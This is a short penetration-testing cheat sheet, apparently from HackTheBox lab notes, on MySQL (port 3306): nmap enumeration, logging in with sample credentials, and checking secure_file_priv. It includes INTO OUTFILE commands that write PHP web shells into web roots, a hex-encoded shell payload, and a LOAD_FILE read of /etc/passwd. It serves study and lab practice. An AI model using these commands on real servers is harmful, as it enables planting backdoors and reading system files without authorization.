HacktheboxGithub

[3306] Mysql

Defaul file configuration: etc/mysql/mysql.conf.d/mysqld.cnf

Tool: dbeaver GUI

To install dbeaver using a Debian package we can download the release .deb package from https://github.com/dbeaver/dbeaver/releases and execute the following command:

Intrusionz3r0X@htb[/htb]**$** sudo dpkg -i dbeaver-<version>.deb]

Intrusionz3r0X@htb[/htb]**$** dbeaver &

https://www.youtube.com/watch?v=PeuWmz8S6G8

MySQL default system schemas/databases:

  • mysql - is the system database that contains tables that store information required by the MySQL server

  • information_schema - provides access to database metadata

  • performance_schema - is a feature for monitoring MySQL Server execution at a low level

  • sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema

#Enumerate Mysql
Intrusionz3r0X@htb[/htb]$ sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*

#Interaction with the MySQL Server
Intrusionz3r0X@htb[/htb]$ mysql -u root -pP4SSw0rd -h 10.129.14.128
C:\\htb> mysql.exe -u username -pPassword123 -h 10.129.20.13

#Check if secure_file_priv is enabled
## If empty, the variable has no effect, which is not a secure setting.
## If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it.
## If set to NULL, the server disables import and export operations.
mysql> show variables like "secure_file_priv";

#Write local files
mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:\\\\xampp\\\\htdocs\\\\backdoor.php';

#system($_GET['cmd']); ?>
0x3c3f7068702073797374656d28245f4745545b27636d64275d293b203f3e 

#Read local dfiles
mysql> select LOAD_FILE("/etc/passwd");

Command

Description

mysql -u <user> -p<password> -h <IP address>

Connect to the MySQL server. There should not be a space between the '-p' flag, and the password.

show databases;

Show all databases.

use <database>;

Select one of the existing databases.

show tables;

Show all available tables in the selected database.

show columns from <table>;

Show all columns in the selected database.

select * from <table>;

Show everything in the desired table.

select * from <table> where <column> = "<string>";

Search for needed string in the desired table.

curl -s -G "<http://83.136.254.158:51914/search.php>" --data-urlencode "port_code=<INJECTION-HERE>" | html2text
Previous[5985/5986] WinRMNext[513] Rlogin

Last updated